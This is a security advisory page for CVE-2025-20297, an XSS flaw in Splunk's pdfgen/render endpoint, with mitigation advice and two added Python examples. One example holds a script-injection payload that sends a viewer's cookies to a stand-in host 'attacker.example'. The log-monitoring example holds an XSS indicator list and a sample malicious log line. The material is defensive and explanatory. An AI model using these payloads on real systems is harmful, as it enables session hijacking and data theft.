
CVE-2025-20297: Improper neutralization of user-controllable input placed in web page output served to other users (cross-site scripting) in Splunk Enterprise

Severity: Medium
Published: Mon Jun 02 2025 (06/02/2025, 17:14:02 UTC)
Source: CVE Database V5
Vendor/Project: Splunk
Product: Splunk Enterprise

Description

In Splunk Enterprise versions below 9.4.2, 9.3.4 and 9.2.6, and Splunk Cloud Platform versions below 9.3.2411.102, 9.3.2408.111 and 9.2.2406.118, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the pdfgen/render REST endpoint that could result in execution of unauthorized JavaScript code in the browser of a user.

AI-Powered Analysis

Last updated: 07/11/2025, 07:50:11 UTC

Technical Analysis

CVE-2025-20297 is a medium-severity cross-site scripting (XSS) vulnerability in Splunk Enterprise before 9.4.2, 9.3.4 and 9.2.6, and in Splunk Cloud Platform before 9.3.2411.102, 9.3.2408.111 and 9.2.2406.118. The root cause is CWE-79: input that a user controls is placed into web page output without being neutralized. An authenticated but low-privileged user, one who holds neither the "admin" nor the "power" role, can submit a crafted payload through the pdfgen/render REST endpoint, the endpoint Splunk uses to render dashboards and reports to PDF. The payload is then emitted into content served to another user and executes as JavaScript in that user's browser, inside that user's Splunk session.

The CVSS 3.1 base score is 4.3 (Medium). The vector recorded for the issue describes a network attack of low complexity that requires low privileges and no user interaction, with a low confidentiality impact and no impact on integrity or availability. No exploitation in the wild had been reported at the time of this analysis. Splunk Enterprise is widely deployed for log management, operational intelligence and as a SIEM, so the accounts that view its dashboards and reports are often privileged analysts and administrators; script executing in their sessions could read data visible to them, issue requests on their behalf, or present convincing phishing content inside an interface they trust.
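
The weakness class behind this CVE, shown as an added example rather than Splunk's code: a user-controlled report title is interpolated into HTML verbatim, beside the same template with the value encoded for the HTML context it lands in. The template, the title parameter and the payload are assumptions for illustration and say nothing about how pdfgen/render actually builds its output.

```python
"""CWE-79 in miniature: unneutralized input in HTML output, and the fix.

Added, generic example; not Splunk code and not a description of the
pdfgen/render implementation. The template and parameter are assumptions."""
from html import escape

# Constructed attacker input: closes the attribute and the tag it sits in,
# then injects a script element that exfiltrates the viewer's cookies.
PAYLOAD = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(title: str) -> str:
    """Interpolates the title verbatim. The leading quote and '>' in PAYLOAD
    break out of the title attribute, and the <script> element is live."""
    return f'<h1 title="{title}">{title}</h1>'


def render_hardened(title: str) -> str:
    """Encodes &, <, >, " and ' as entity references, so the value is inert
    both inside the quoted attribute and as element text."""
    safe = escape(title, quote=True)
    return f'<h1 title="{safe}">{safe}</h1>'


def contains_active_script(html: str) -> bool:
    """Crude marker used only to compare the two renderings: does a literal
    <script tag survive into the output?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
    print("vulnerable has live script:", contains_active_script(render_vulnerable(PAYLOAD)))
    print("hardened has live script:  ", contains_active_script(render_hardened(PAYLOAD)))
```

Encoding has to match the output context: html.escape(quote=True) is right for element text and quoted attribute values, but a value placed inside a script block, a URL or a CSS property needs that context's own encoding, and a value placed in an unquoted attribute is not made safe by entity encoding alone.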

Potential Impact

For European organizations the exposure is primarily to confidentiality: script running in a victim's browser can read what that user can see in Splunk and act within their session. Organizations that rely on Splunk Enterprise or Splunk Cloud Platform for log management and security analytics should assume the victims of interest are analysts and administrators, whose sessions give access to security telemetry and, through Splunk's REST API, to configuration. Because the attacker needs only a low-privileged account, an insider or a single compromised low-privileged login is enough to reach users with far greater access, which makes the issue a privilege-escalation path rather than an isolated XSS. Where the exposed data is personal data, unauthorized disclosure can trigger GDPR notification duties and penalties in addition to reputational damage. Although the CVSS vector records no integrity or availability impact, script injected into the pages analysts use for monitoring could also alter what a dashboard or report appears to show, so manipulated or misleading content is a secondary risk. Direct impact on system integrity or availability is not expected; the realistic outcomes are session hijacking, data exposure and phishing within the Splunk user base.

Mitigation Recommendations

Upgrade affected Splunk Enterprise instances to 9.4.2, 9.3.4 or 9.2.6 (or later) and confirm that Splunk Cloud Platform tenants are at 9.3.2411.102, 9.3.2408.111, 9.2.2406.118 or later; these are the fixed releases named in the description. Until the upgrade is complete, reduce who can reach the pdfgen/render REST endpoint: review role definitions so that only roles with a business need for on-demand or scheduled PDF output keep access, and remove it from low-privileged roles that do not. Monitor use of the endpoint. Splunk records REST requests to splunkd, including the calling user and the request line, in splunkd_access.log, so requests to pdfgen/render from unexpected accounts, or with markup or script in the query string, are a practical detection. A web application firewall rule that blocks obvious script in requests to the endpoint can buy time, but treat it as a stopgap: encoding variations bypass such rules, and the fix is the vendor patch. User awareness has limited value against XSS, since the victim's only action is viewing Splunk content; prioritize the patch, the role review and the monitoring. Include Splunk deployments in regular security audits and penetration tests to catch residual exposure, and keep REST access logging enabled with alerting on it so exploitation attempts are caught early.
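
The monitoring advised above, as an added example that is not part of the advisory or of Splunk's own tooling: it parses REST access-log lines, keeps only requests to pdfgen/render (in both the /services and namespaced /servicesNS forms) and flags those made by users outside an expected set or carrying markup or script in a decoded query parameter. It assumes a combined-log-style layout similar to splunkd_access.log (client, user, timestamp, request line, status, bytes); the sample lines are constructed, and the trusted-user set, indicator list and the input-dashboard parameter name are illustrative choices a deployment would tune.

```python
"""Flag suspicious pdfgen/render requests in REST access logs.

Added example, not advisory or Splunk code. Log layout, trusted users and
indicator strings are assumptions; SAMPLE_LOG is constructed, not real traffic."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Accounts expected to trigger PDF rendering (assumption for the example).
TRUSTED_USERS = {"admin", "report-svc"}

# The endpoint in its global and namespaced REST forms.
ENDPOINT_RE = re.compile(r"^/(services|servicesNS/[^/]+/[^/]+)/pdfgen/render(\?|$)")

# Markers that have no business in a dashboard or report name.
XSS_INDICATORS = ("<", ">", "javascript:", "onerror=", "onload=", "</")

# client - user [time] "METHOD target HTTP/x" status ... (combined-log style)
LINE_RE = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines: one benign render, one payload from a low-privileged
# user, one unrelated call, one render by a user outside the expected set.
SAMPLE_LOG = """\
10.0.0.5 - admin [02/Jun/2025:10:01:02.000 +0000] "GET /services/pdfgen/render?input-dashboard=weekly_ops&namespace=search HTTP/1.1" 200 48211 - - - 310ms
10.0.0.9 - jdoe [02/Jun/2025:10:04:17.000 +0000] "GET /servicesNS/jdoe/search/pdfgen/render?input-dashboard=%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E&namespace=search HTTP/1.1" 200 1932 - - - 45ms
10.0.0.9 - jdoe [02/Jun/2025:10:05:40.000 +0000] "GET /services/search/jobs HTTP/1.1" 200 8820 - - - 12ms
10.0.0.7 - alice [02/Jun/2025:10:06:01.000 +0000] "POST /services/pdfgen/render HTTP/1.1" 200 50112 - - - 290ms
"""


def analyze(log_text: str) -> list[dict]:
    """One finding per pdfgen/render request made by an untrusted user or
    carrying an XSS indicator in a query parameter; other lines are ignored."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = m["target"]
        if not ENDPOINT_RE.match(target):
            continue
        reasons = []
        if m["user"] not in TRUSTED_USERS:
            reasons.append("untrusted_user")
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            # parse_qsl already percent-decodes once; decoding again catches
            # payloads that were double-encoded to slip past naive filters.
            decoded = unquote_plus(value).lower()
            if any(ind in decoded for ind in XSS_INDICATORS):
                reasons.append(f"xss_indicator:{key}")
                break
        if reasons:
            findings.append({"user": m["user"], "client": m["client"],
                             "time": m["time"], "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["time"], f["user"], f["client"], ",".join(f["reasons"]), f["target"])
```

Request bodies are not logged, so a POST carrying the payload in its body (the alice line) is only visible as an unexpected caller; pair this with the role review so that the set of accounts allowed to reach the endpoint is small enough for that signal to be meaningful.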


Technical Details

Data Version
5.1
Assigner Short Name
cisco
Date Reserved
2024-10-10T19:15:13.252Z
CVSS Version
3.1
State
PUBLISHED

Threat ID: 683ddf3a182aa0cae24e7e32

Added to database: 6/2/2025, 5:28:26 PM

Last enriched: 7/11/2025, 7:50:11 AM

Last updated: 8/11/2025, 5:34:36 PM

